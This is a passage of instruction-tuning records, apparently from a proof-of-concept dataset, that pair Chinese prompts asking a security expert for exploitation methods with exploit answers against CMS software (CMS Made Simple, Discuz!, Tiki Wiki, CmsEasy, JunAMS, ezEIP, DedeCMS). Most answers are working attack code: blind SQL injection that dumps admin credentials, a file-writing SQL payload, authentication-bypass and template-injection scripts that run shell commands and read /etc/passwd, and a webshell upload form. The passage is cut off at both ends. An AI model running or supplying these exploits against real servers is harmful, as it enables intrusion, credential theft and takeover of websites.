\"a,b,1,5))+and+(select+sleep(\" + str(TIME) + \")+from+cms_siteprefs+where+sitepref_value+like+0x\" + ord_salt_temp + \"25+and+sitepref_name+like+0x736974656d61736b)+--+\"\n            url = url_vuln + \"&m1_idlist=\" + payload\n            start_time = time.time()\n            r = session.get(url)\n            elapsed_time = time.time() - start_time\n            if elapsed_time >= TIME:\n                flag = True\n                break\n        if flag:\n            salt = temp_salt\n            ord_salt = ord_salt_temp\n    flag = True\n    output += '\\n[+] Salt for password found: ' + salt\n\ndef dump_password():\n    global flag\n    global password\n    global output\n    ord_password = \"\"\n    ord_password_temp = \"\"\n    while flag:\n        flag = False\n        for i in range(0, len(dictionary)):\n            temp_password = password + dictionary[i]\n            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]\n            beautify_print_try(temp_password)\n            payload = \"a,b,1,5))+and+(select+sleep(\" + str(TIME) + \")+from+cms_users\"\n            payload += \"+where+password+like+0x\" + ord_password_temp + \"25+and+user_id+like+0x31)+--+\"\n            url = url_vuln + \"&m1_idlist=\" + payload\n            start_time = time.time()\n            r = session.get(url)\n            elapsed_time = time.time() - start_time\n            if elapsed_time >= TIME:\n                flag = True\n                break\n        if flag:\n            password = temp_password\n            ord_password = ord_password_temp\n    flag = True\n    output += '\\n[+] Password found: ' + password\n\ndef dump_username():\n    global flag\n    global db_name\n    global output\n    ord_db_name = \"\"\n    ord_db_name_temp = \"\"\n    while flag:\n        flag = False\n        for i in range(0, len(dictionary)):\n            temp_db_name = db_name + dictionary[i]\n            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]\n            beautify_print_try(temp_db_name)\n            payload = \"a,b,1,5))+and+(select+sleep(\" + str(TIME) + \")+from+cms_users+where+username+like+0x\" + ord_db_name_temp + \"25+and+user_id+like+0x31)+--+\"\n            url = url_vuln + \"&m1_idlist=\" + payload\n            start_time = time.time()\n            r = session.get(url)\n            elapsed_time = time.time() - start_time\n            if elapsed_time >= TIME:\n                flag = True\n                break\n        if flag:\n            db_name = temp_db_name\n            ord_db_name = ord_db_name_temp\n    output += '\\n[+] Username found: ' + db_name\n    flag = True\n\ndef dump_email():\n    global flag\n    global email\n    global output\n    ord_email = \"\"\n    ord_email_temp = \"\"\n    while flag:\n        flag = False\n        for i in range(0, len(dictionary)):\n            temp_email = email + dictionary[i]\n            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]\n            beautify_print_try(temp_email)\n            payload = \"a,b,1,5))+and+(select+sleep(\" + str(TIME) + \")+from+cms_users+where+email+like+0x\" + ord_email_temp + \"25+and+user_id+like+0x31)+--+\"\n            url = url_vuln + \"&m1_idlist=\" + payload\n            start_time = time.time()\n            r = session.get(url)\n            elapsed_time = time.time() - start_time\n            if elapsed_time >= TIME:\n                flag = True\n                break\n        if flag:\n            email = temp_email\n            ord_email = ord_email_temp\n    output += '\\n[+] Email found: ' + email\n    flag = True\n\ndump_salt()\ndump_username()\ndump_email()\ndump_password()\n\nif options.cracking:\n    print colored(\"[*] Now try to crack password\")\n    crack_password()\n\nbeautify_print()\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/CMS Made Simple (CMSMS) 前台SQL注入漏洞 CVE-2019-9053.md"}
    34. 

  34. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Discuz!X 3.4 admincp_setting.php 后台SQL注入漏洞\n漏洞描述:不久以前Discuz!X的后台披露了一个sql注入的漏洞,这里也要感谢漏洞的发现和研究者(无糖的kn1f3)。\n影响版本:``` Discuz!X <3.4 R20191201 版本 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. Discuz!X <3.4 R20191201 版本\n2. 1' union select \"<?php phpinfo();?>\"  into outfile 'D:/test.php';--+\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Discuz!X 3.4 admincp_setting.php 后台SQL注入漏洞.md"}
    35. 

  35. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:CmsEasy language_admin.php 后台命令执行漏洞\n漏洞描述:CmsEasy 后台存在命令执行漏洞,通过文件 language_admin.php 对部分文件进行写入操作,导致任意文件写入\n影响版本:``` CmsEasy V7.7.5_20210919 ```\n网络测绘:``` body=\"cmseasyedit\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. CmsEasy V7.7.5_20210919\n2. body=\"cmseasyedit\"\n3. function add_action() {\n        $lang_choice='system.php';\n        if (isset($_GET['lang_choice'])){\n            $lang_choice=$_GET['lang_choice'];\n        }\n        if (front::post('submit')) {\n            $langid=front::get('id');\n            $lang=new lang();\n            $langdata = $lang->getrows('id='.$langid, 1);\n            if (is_array($langdata)){\n                $langurlname=$langdata[0]['langurlname'];\n            }else{\n                front::alert(lang_admin('language_pack').lang_admin('nonentity'));\n            }\n            $path=ROOT.'/lang/'.$langurlname.'/'.$lang_choice;\n            $tipspath=ROOT.'/lang/'.$langurlname.'/'.$lang_choice;\n            $content=file_get_contents($path);\n            $tipscontent=file_get_contents($tipspath);\n            $replace=\"'\".front::$post['key'].\"'=>'\".front::$post['val'].\"',\";\n            $tipsreplace=\"'\".front::$post['key'].\"'=>'\".front::$post['cnnote'].\"',\";\n            $content=str_replace(');',\"\\n\".$replace.');',$content);\n            file_put_contents($path,$content);\n            $pos=strpos($tipscontent,$tipsreplace);\n            if ($langurlname != 'cn'&&$pos === false) {\n                $tipscontent=str_replace(');',\"\\n\".$tipsreplace.');',$tipscontent);\n                file_put_contents($tipspath,$tipscontent);\n            }\n            if ($_GET['site'] != 'default') {\n                $ftp=new nobftp();\n                $ftpconfig=config::get('website');\n                $ftp->connect($ftpconfig['ftpip'],$ftpconfig['ftpuser'],$ftpconfig['ftppwd'],$ftpconfig['ftpport']);\n                $ftperror=$ftp->returnerror();\n                if ($ftperror) {\n                    exit($ftperror);\n                }\n                else {\n                    $ftp->nobchdir($ftpconfig['ftppath']);\n                    $ftp->nobput($ftpconfig['ftppath'].'/lang/'.$langurlname.'/'.$lang_choice,$path);\n                }\n            }\n            event::log(lang_admin('add_to').lang_admin('language_pack'),lang_admin('success'));\n            //\n            $shepi='<script type=\"text/javascript\">alert(\"'.lang_admin('dosomething').lang_admin('complete').'\");gotoinurl(\"'.url('language/edit/id/'.$langdata[0]['id'],true);\n            $shepi=$shepi.'&lang_choice='.$lang_choice;\n            $shepi=$shepi.'\");</script>';\n            echo $shepi;\n            //exit;\n            //front::refresh(url('language/edit',true));\n        }\n        $this->view->lang_choice=$lang_choice;\n    }\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/CmsEasy language_admin.php 后台命令执行漏洞.md"}
    36. 

  36. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Tiki Wiki CMS Groupware 认证绕过漏洞 CVE-2020-15906\n漏洞描述:Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。 参考链接: - https://info.tiki.org/article473-Security-Releases-of-all-Tiki-versions-since-16-3 - https://github.com/S1lkys/CVE-2020-15906 - http://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html - https://srcincite.io/pocs/cve-2021-26119.py.txt\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2020-15906\n【POC利用方法】\n1. docker-compose up -d\n2. python poc.py your-ip:8080 / id\n3. #!/usr/bin/env python3\n\"\"\"\nTiki Wiki CMS GroupWare Serverside Template Injection Remote Code Execution Vulnerability\nThis is a demonstration of CVE-2021-26119 (Smarty Template Engine template_object Sandbox Escape PHP Code Injection)\nWritten by: Steven Seeley of Qihoo 360 Vulcan Team\nExploit tested against: Tiki Wiki 20.3 (Tarazed)\n\nBug 1: CVE-2020-15906\n    - An unauthenticated user can bypass the authentication by bruteforcing the admin account > 50 times and login with a blank password\n    - Works on: <= 21.1 (UY_Scuti)\n    \nBug 2: CVE-2021-26119 \n    - An admin user can trigger a serverside template injection and gain remote code execution by escaping the sandbox of the Smarty Template Engine by leveraging the 'template_object' property\n    - Works on: <= 22.2 (Corona_Borealis) and impacts Smarty <= 3.1.38 (latest)\n\n# Notes\n\n- *WARNING* This exploit will lock out the administrator account\n- It was possible in older versions of Tiki Wiki (including 20.3) that you could:\n\n  1. Edit Smarty templates with a user that had the 'tiki_p_edit_templates' privilege, but Tiki clued into this and has since disabled this 'feature' by default, see using [Risky preferences](https://doc.tiki.org/Risky-Preferences)\n  2. Disable the Smarty sandbox entirely by unchecking the \"Smarty Security\" checkbox in the general security tab which is no longer possible.\n\n  However it's still possible for an admin (or user with the 'tiki_p_admin' permission assigned) to add Smarty template syntax to the 'feature_custom_html_head_content' option under [Customization](http://doc.tiki.org/Customization) in the [Look and Feel](http://doc.tiki.org/Look-and-Feel) control panel menu. This is enough for attackers to escape the Smarty sandbox leveraging either CVE-2021-26119 or CVE-2021-26120 and execute arbitrary remote code.\n\n# Example\n\nresearcher@incite:~/tiki$ ./poc.py\n(+) usage: ./poc.py <host> <path> <cmd>\n(+) eg: ./poc.py 192.168.75.141 / id\n(+) eg: ./poc.py 192.168.75.141 /tiki-20.3/ id\n\nresearcher@incite:~/tiki$ ./poc.py 192.168.75.141 /tiki-20.3/ \"id;uname -a;pwd;head /etc/passwd\"\n(+) blanking password...\n(+) admin password blanked!\n(+) getting a session...\n(+) auth bypass successful!\n(+) triggering rce...\n\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nLinux target 5.8.0-40-generic #45-Ubuntu SMP Fri Jan 15 11:05:36 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux\n/var/www/html/tiki-20.3\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n\n# References\n\n- Maximilian Barz's poc at https://github.com/S1lkys/CVE-2020-15906\n\"\"\"\n\nimport requests\nimport sys\nimport re\n\ndef auth_bypass(s, t, d):\n    h = { \"referer\" : t }\n    d[\"ticket\"] = get_ticket(s, \"%stiki-login.php\" % t)\n    d[\"pass\"] = \"\" # auth bypass is here\n    r = s.post(\"%stiki-login.php\" % t, data=d, headers=h)\n    r = s.get(\"%stiki-admin.php\" % t)\n    assert (\"You do not have the permission that is needed\" not in r.text), \"(-) authentication bypass failed!\"\n\ndef black_password(s, t, d):\n    uri = \"%stiki-login.php\" % t\n    # setup cookies here\n    s.get(uri)\n    ticket = get_ticket(s, uri)\n    # crafted especially so unsuccessful_logins isn't recorded\n    for i in range(0, 51):\n        r = s.post(uri, d)\n        if(\"Account requires administrator approval.\" in r.text):\n            print(\"(+) admin password blanked!\")\n            return\n    raise Exception(\"(-) auth bypass failed!\") \n\ndef get_ticket(s, uri):\n    h = { \"referer\" : uri }\n    r = s.get(uri)\n    match = re.search('class=\"ticket\" name=\"ticket\" value=\"(.*)\" \\/>', r.text)\n    assert match, \"(-) csrf ticket leak failed!\"\n    return match.group(1)\n\ndef trigger_or_patch_ssti(s, t, c=None):\n    # CVE-2021-26119\n    p = { \"page\": \"look\" }\n    h = { \"referer\" : t }\n    bypass = \"startrce{$smarty.template_object->smarty->disableSecurity()->display('string:{shell_exec(\\\"%s\\\")}')}endrce\" % c\n    d = {\n        \"ticket\" : get_ticket(s, \"%stiki-admin.php\" % t),\n        \"feature_custom_html_head_content\" : bypass if c else '',\n        \"lm_preference[]\": \"feature_custom_html_head_content\"\n    }\n    r = s.post(\"%stiki-admin.php\" % t, params=p, data=d, headers=h)\n    r = s.get(\"%stiki-index.php\" % t)\n    if c != None:\n        assert (\"startrce\" in r.text and \"endrce\" in r.text), \"(-) rce failed!\"\n        cmdr = r.text.split(\"startrce\")[1].split(\"endrce\")[0]\n        print(cmdr.strip())\n\ndef main():\n    if(len(sys.argv) < 4):\n        print(\"(+) usage: %s <host> <path> <cmd>\" % sys.argv[0])\n        print(\"(+) eg: %s 192.168.75.141 / id\"% sys.argv[0])\n        print(\"(+) eg: %s 192.168.75.141 /tiki-20.3/ id\" % sys.argv[0])\n        return\n    p = sys.argv[2]\n    c = sys.argv[3]\n    p = p + \"/\" if not p.endswith(\"/\") else p\n    p = \"/\" + p if not p.startswith(\"/\") else p\n    t = \"http://%s%s\" % (sys.argv[1], p)\n    s = requests.Session()\n    print(\"(+) blanking password...\")\n    d = {\n        'user':'admin', \n        'pass':'trololololol',\n    }\n    black_password(s, t, d)\n    print(\"(+) getting a session...\")\n    auth_bypass(s, t, d)\n    print(\"(+) auth bypass successful!\")\n    print(\"(+) triggering rce...\\n\")\n    # trigger for rce\n    trigger_or_patch_ssti(s, t, c)\n    # patch so we stay hidden\n    trigger_or_patch_ssti(s, t)\n\nif __name__ == '__main__':\n    main()\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Tiki Wiki CMS Groupware 认证绕过漏洞 CVE-2020-15906.md"}
    37. 

  37. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ezEIP 4.1.0 信息泄露漏洞\n漏洞描述:ezEIP 4.1.0 存在信息泄露漏洞,通过遍历Cookie中的参数值获取敏感信息\n影响版本:``` ezEIP 4.1.0 ```\n网络测绘:``` \"ezEIP\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. ezEIP 4.1.0\n2. /label/member/getinfo.aspx\n3. WHIR_USERINFOR=whir_mem_member_pid=1;\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/ezEIP 4.1.0 信息泄露漏洞.md"}
    38. 

  38. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:CMS Made Simple (CMSMS) 前台代码执行漏洞 CVE-2021-26120\n漏洞描述:CMS Made Simple(CMSMS)是一个免费的开放源码内容管理系统,为开发人员、程序员和网站所有者提供基于网络的开发和管理功能。 Smarty 3.1.39 之前的版本允许在 `{function name=` 子串后注入PHP代码,导致代码注入漏洞,该漏洞即为CVE-2021-26120。 CMS Made Simple 版本 <= 2.2.15,拥有设计师权限的用户可以在后台利用服务端模板注入漏洞,即为前面提到的CVE-2021-26120。 因此,如果CMSMS版本低于2.2.9.1,未授权的攻击者可以结合[CVE-2019-9053](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2019-9053)和CVE-2021-26120漏洞,在服务器上执行任意代码。 参考链接: - [https://www.exploit-db.com/exploits/46635](https://www.exploit-db.com/exploits/46635) - [https://srcincite.io/pocs/cve-2021-26120.py.txt](https://srcincite.io/pocs/cve-2021-26120.py.txt)\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2021-26120\n【POC利用方法】\n1. docker compose up -d\n2. (py27) python poc.py your-vps-ip / id\n3. import requests\nimport sys\nimport re\nfrom time import sleep\nfrom lxml import etree\n\ndef login(s, t, usr):\n    uri = \"%sadmin/login.php\" % t\n    s.get(uri)\n    d = {\n        \"username\" : usr,\n        \"password\" : usr,\n        \"loginsubmit\" : \"Submit\"\n    }\n    r = s.post(uri, data=d)\n    match = re.search(\"style.php\\?__c=(.*)\\\"\", r.text)\n    assert match, \"(-) login failed\"\n    return match.group(1)\n\ndef trigger_or_patch_ssti(s, csrf, t, tpl):\n    # CVE-2021-26120 \n    d = {\n        \"mact\": 'DesignManager,m1_,admin_edit_template,0',\n        \"__c\" : csrf,\n        \"m1_tpl\" : 10,\n        \"m1_submit\" : \"Submit\",\n        \"m1_name\" : \"Simplex\",\n        \"m1_contents\" : tpl\n    }\n    r = s.post(\"%sadmin/moduleinterface.php\" % t, files={}, data=d)\n    if \"rce()\" in tpl:\n        r = s.get(\"%sindex.php\" % t)\n        assert (\"endrce\" in r.text), \"(-) rce failed!\"\n        cmdr = r.text.split(\"endrce\")[0]\n        print(cmdr.strip())\n\ndef determine_bool(t, exp):\n    p = {\n       \"mact\" : \"News,m1_,default,0\",\n       \"m1_idlist\": \",1)) and %s-- \" % exp\n    }\n    r = requests.get(\"%smoduleinterface.php\" % t, params=p) \n    return True if r.text.count(\"Posted by:\") == 2 else False\n\ndef trigger_sqli(t, char, sql, c_range):\n    # CVE-2019-9053\n    for i in c_range:\n        # <> characters are html escaped so we just have =\n        # substr w/ from/for because anymore commas and the string is broken up resulting in an invalid query\n        if determine_bool(t, \",1)) and ascii(substr((%s) from %d for 1))=%d-- \" % (sql, char, i)): return chr(i) \n    return -1\n    \ndef leak_string(t, sql, leak_name, max_length, c_range):\n    sys.stdout.write(\"(+) %s: \" % leak_name)\n    sys.stdout.flush()\n    leak_string = \"\"\n    for i in range(1,max_length+1):\n        c = trigger_sqli(t, i, sql, c_range)\n        # username is probably < 25 characters\n        if c == -1:\n            break\n        leak_string += c\n        sys.stdout.write(c)\n        sys.stdout.flush()\n    assert len(leak_string) > 0, \"(-) sql injection failed for %s!\" % leak_name\n    return leak_string    \n    \ndef reset_pwd_stage1(t, usr):\n    d = {\n        \"forgottenusername\" : usr,\n        \"forgotpwform\" : 1,\n    }\n    r = requests.post(\"%sadmin/login.php\" % t, data=d)\n    assert (\"User Not Found\" not in r.text), \"(-) password reset failed!\"\n\ndef reset_pwd_stage2(t, usr, key):\n    d = {\n        \"username\" : usr,\n        \"password\" : usr,      # just reset to the username\n        \"passwordagain\" : usr, # just reset to the username\n        \"changepwhash\" : key,\n        \"forgotpwchangeform\": 1,\n        \"loginsubmit\" : \"Submit\",\n    }\n    r = requests.post(\"%sadmin/login.php\" % t, data=d)\n    match = re.search(\"Welcome: <a href=\\\"myaccount.php\\?__c=[a-z0-9]*\\\">(.*)<\\/a>\", r.text)\n    assert match, \"(-) password reset failed!\"\n    assert match.group(1) == usr, \"(-) password reset failed!\"\n\ndef leak_simplex(s, t, csrf):\n    p = {\n        \"mact\" : \"DesignManager,m1_,admin_edit_template,0\",\n        \"__c\" : csrf,\n        \"m1_tpl\" : 10\n    }\n    r = s.get(\"%sadmin/moduleinterface.php\" % t, params=p)\n    page = etree.HTML(r.text)\n    tpl = page.xpath(\"//textarea//text()\")\n    assert tpl is not None, \"(-) leaking template failed!\"\n    return \"\".join(tpl)\n\ndef remove_locks(s, t, csrf):\n    p = {\n        \"mact\" : \"DesignManager,m1_,admin_clearlocks,0\",\n        \"__c\" : csrf,\n        \"m1_type\" : \"template\"\n    }\n    s.get(\"%sadmin/moduleinterface.php\" % t, params=p)\n\ndef main():\n    if(len(sys.argv) < 4):\n        print(\"(+) usage: %s <host> <path> <cmd>\" % sys.argv[0])\n        print(\"(+) eg: %s 192.168.75.141 / id\" % sys.argv[0])\n        print(\"(+) eg: %s 192.168.75.141 /cmsms/ \\\"uname -a\\\"\" % sys.argv[0])\n        return\n    pth = sys.argv[2]\n    cmd = sys.argv[3]\n    pth = pth + \"/\" if not pth.endswith(\"/\") else pth\n    pth = \"/\" + pth if not pth.startswith(\"/\") else pth\n    target = \"http://%s%s\" % (sys.argv[1], pth)\n    print(\"(+) targeting %s\" % target)\n    if determine_bool(target, \"1=1\") and not determine_bool(target, \"1=2\"):\n        print(\"(+) sql injection working!\")\n    print(\"(+) leaking the username...\")\n    username = leak_string(\n        target,\n        \"select username from cms_users where user_id=1\",\n        \"username\",\n        25, # username column is varchar(25) in the db\n        list(range(48,58)) + list(range(65,91)) + list(range(97,123)) # charset: 0-9A-Za-z\n    )\n    print(\"\\n(+) resetting the %s's password stage 1\" % username)\n    reset_pwd_stage1(target, username)\n    print(\"(+) leaking the pwreset token...\")\n    pwreset = leak_string(\n        target,\n        \"select value from cms_userprefs where preference=0x70777265736574 and user_id=1\", # qoutes will break things\n        \"pwreset\",\n        32, # md5 hash is always 32\n        list(range(48,58)) + list(range(97,103)) # charset: 0-9a-f\n    )\n    print(\"\\n(+) done, resetting the %s's password stage 2\" % username)\n    reset_pwd_stage2(target, username, pwreset)\n    session = requests.Session()\n    print(\"(+) logging in...\")\n    csrf = login(session, target, username)\n    print(\"(+) leaking simplex template...\")\n    remove_locks(session, target, csrf)\n    simplex_tpl = leak_simplex(session, target, csrf)\n    print(\"(+) injecting payload and executing cmd...\\n\")\n    rce_tpl = \"{function name='rce(){};system(\\\"%s\\\");function '}{/function}endrce\" % cmd\n    trigger_or_patch_ssti(session, csrf, target, rce_tpl+simplex_tpl)\n    while True:\n        r = session.get(\"%sindex.php\" % target)\n        if \"endrce\" not in r.text:\n            break\n        trigger_or_patch_ssti(session, csrf, target, simplex_tpl)\n\nif __name__ == '__main__':\n    main()\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/CMS Made Simple (CMSMS) 前台代码执行漏洞 CVE-2021-26120.md"}
    39. 

  39. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JunAms内容管理系统文件上传漏洞 CNVD-2020-24741\n漏洞描述:JunAMS是一款以ThinkPHP为框架的开源内容管理系统。 JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。 参考链接: - https://www.cnvd.org.cn/flaw/show/CNVD-2020-24741\n影响版本:``` JunAMS junAMS 1.2.1.20190403 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. JunAMS junAMS 1.2.1.20190403\n2. <form enctype=\"multipart/form-data\" action=\"http://localhost//admin.php/common/add_images.html\" method=\"post\">  \n<input type=\"file\" name=\"file\" size=\"50\"><br>  \n<input type=\"submit\" value=\"Upload\">  \n</form>\n3. <input type=\"file\" name=\"file\" size=\"50\"><br>\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/JunAms内容管理系统文件上传漏洞 CNVD-2020-24741.md"}
    40. 

  40. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:DedeCMS 5.8.1 common.func.php 远程命令执行漏洞\n漏洞描述:DocCMS flink.php 文件存远程命令执行漏洞,攻击者通过漏洞可以执行任意命令\n影响版本:``` DedeCMS v5.81 beta 内测版 ```\n网络测绘:``` \"DedeCMS_V5.8.1\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. DedeCMS v5.81 beta 内测版\n2. \"DedeCMS_V5.8.1\"\n3. function ShowMsg($msg, $gourl, $onlymsg = 0, $limittime = 0)\n{\n    if (empty($GLOBALS['cfg_plus_dir'])) {\n        $GLOBALS['cfg_plus_dir'] = '..';\n    }\n    if ($gourl == -1) {\n        $gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';\n        if ($gourl == \"\") {\n            $gourl = -1;\n        }\n    }\n\n    $htmlhead = \"\n    <html>\\r\\n<head>\\r\\n<title>DedeCMS提示信息</title>\\r\\n\n    <meta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset={dede:global.cfg_soft_lang/}\\\" />\n    <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no\\\">\n    <meta name=\\\"renderer\\\" content=\\\"webkit\\\">\n    <meta http-equiv=\\\"Cache-Control\\\" content=\\\"no-siteapp\\\" />\n    <link rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"{dede:global.cfg_assets_dir/}/pkg/uikit/css/uikit.min.css\\\" />\n    <link rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"{dede:global.cfg_assets_dir/}/css/manage.dede.css\\\">\n    <base target='_self'/>\n    </head>\n    <body>\n    \" . (isset($GLOBALS['ucsynlogin']) ? $GLOBALS['ucsynlogin'] : '') . \"\n    <center style=\\\"width:450px\\\" class=\\\"uk-container\\\">\n    \n    <div class=\\\"uk-card uk-card-small uk-card-default\\\" style=\\\"margin-top: 50px;\\\">\n        <div class=\\\"uk-card-header\\\"  style=\\\"height:20px\\\">DedeCMS 提示信息!</div>\n\n    <script>\\r\\n\";\n    $htmlfoot = \"\n    </script>\n    \n    \n    </center>\n    \n    <script src=\\\"{dede:global.cfg_assets_dir/}/pkg/uikit/js/uikit.min.js\\\"></script>\n\t<script src=\\\"{dede:global.cfg_assets_dir/}/pkg/uikit/js/uikit-icons.min.js\\\"></script>\n    </body>\\r\\n</html>\\r\\n\";\n\n    $litime = ($limittime == 0 ? 1000 : $limittime);\n    $func = '';\n\n    if ($gourl == '-1') {\n        if ($limittime == 0) {\n            $litime = 3000;\n        }\n\n        $gourl = \"javascript:history.go(-1);\";\n    }\n\n    if ($gourl == '' || $onlymsg == 1) {\n        $msg = \"<script>alert(\\\"\" . str_replace(\"\\\"\", \"“\", $msg) . \"\\\");</script>\";\n    } else {\n        //当网址为:close::objname 时, 关闭父框架的id=objname元素\n        if (preg_match('/close::/', $gourl)) {\n            $tgobj = trim(preg_replace('/close::/', '', $gourl));\n            $gourl = 'javascript:;';\n            $func .= \"window.parent.document.getElementById('{$tgobj}').style.display='none';\\r\\n\";\n        }\n\n        $func .= \"var pgo=0;\n      function JumpUrl(){\n        if(pgo==0){ location='$gourl'; pgo=1; }\n      }\\r\\n\";\n        $rmsg = $func;\n        $rmsg .= \"document.write(\\\"<div style='height:130px;font-size:10pt;background:#ffffff'><br />\\\");\\r\\n\";\n        $rmsg .= \"document.write(\\\"\" . str_replace(\"\\\"\", \"“\", $msg) . \"\\\");\\r\\n\";\n        $rmsg .= \"document.write(\\\"\";\n\n        if ($onlymsg == 0) {\n            if ($gourl != 'javascript:;' && $gourl != '') {\n                $rmsg .= \"<br /><a href='{$gourl}'>如果你的浏览器没反应,请点击这里...</a>\";\n                $rmsg .= \"<br/></div>\\\");\\r\\n\";\n                $rmsg .= \"setTimeout('JumpUrl()',$litime);\";\n            } else {\n                $rmsg .= \"<br/></div>\\\");\\r\\n\";\n            }\n        } else {\n            $rmsg .= \"<br/><br/></div>\\\");\\r\\n\";\n        }\n        $msg = $htmlhead . $rmsg . $htmlfoot;\n    }\n    \n    $tpl = new DedeTemplate();\n    $tpl->LoadString($msg);\n    $tpl->Display();\n}\n\n/**\n *  获取验证码的session值\n *\n * @return string\n */\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/DedeCMS 5.8.1 common.func.php 远程命令执行漏洞.md"}
    41. 

  41. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:DedeCMS common.func.php 远程命令执行漏洞\n漏洞描述:DocCMS flink.php 文件存远程命令执行漏洞,攻击者通过漏洞可以执行任意命令\n影响版本:``` DedeCMS v5.81 beta 内测版 ```\n网络测绘:``` \"DedeCMS_V5.8.1\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. DedeCMS v5.81 beta 内测版\n2. \"DedeCMS_V5.8.1\"\n3. function ShowMsg($msg, $gourl, $onlymsg = 0, $limittime = 0)\n{\n    if (empty($GLOBALS['cfg_plus_dir'])) {\n        $GLOBALS['cfg_plus_dir'] = '..';\n    }\n    if ($gourl == -1) {\n        $gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';\n        if ($gourl == \"\") {\n            $gourl = -1;\n        }\n    }\n\n    $htmlhead = \"\n    <html>\\r\\n<head>\\r\\n<title>DedeCMS提示信息</title>\\r\\n\n    <meta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset={dede:global.cfg_soft_lang/}\\\" />\n    <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no\\\">\n    <meta name=\\\"renderer\\\" content=\\\"webkit\\\">\n    <meta http-equiv=\\\"Cache-Control\\\" content=\\\"no-siteapp\\\" />\n    <link rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"{dede:global.cfg_assets_dir/}/pkg/uikit/css/uikit.min.css\\\" />\n    <link rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"{dede:global.cfg_assets_dir/}/css/manage.dede.css\\\">\n    <base target='_self'/>\n    </head>\n    <body>\n    \" . (isset($GLOBALS['ucsynlogin']) ? $GLOBALS['ucsynlogin'] : '') . \"\n    <center style=\\\"width:450px\\\" class=\\\"uk-container\\\">\n    \n    <div class=\\\"uk-card uk-card-small uk-card-default\\\" style=\\\"margin-top: 50px;\\\">\n        <div class=\\\"uk-card-header\\\"  style=\\\"height:20px\\\">DedeCMS 提示信息!</div>\n\n    <script>\\r\\n\";\n    $htmlfoot = \"\n    </script>\n    \n    \n    </center>\n    \n    <script src=\\\"{dede:global.cfg_assets_dir/}/pkg/uikit/js/uikit.min.js\\\"></script>\n\t<script src=\\\"{dede:global.cfg_assets_dir/}/pkg/uikit/js/uikit-icons.min.js\\\"></script>\n    </body>\\r\\n</html>\\r\\n\";\n\n    $litime = ($limittime == 0 ? 1000 : $limittime);\n    $func = '';\n\n    if ($gourl == '-1') {\n        if ($limittime == 0) {\n            $litime = 3000;\n        }\n\n        $gourl = \"javascript:history.go(-1);\";\n    }\n\n    if ($gourl == '' || $onlymsg == 1) {\n        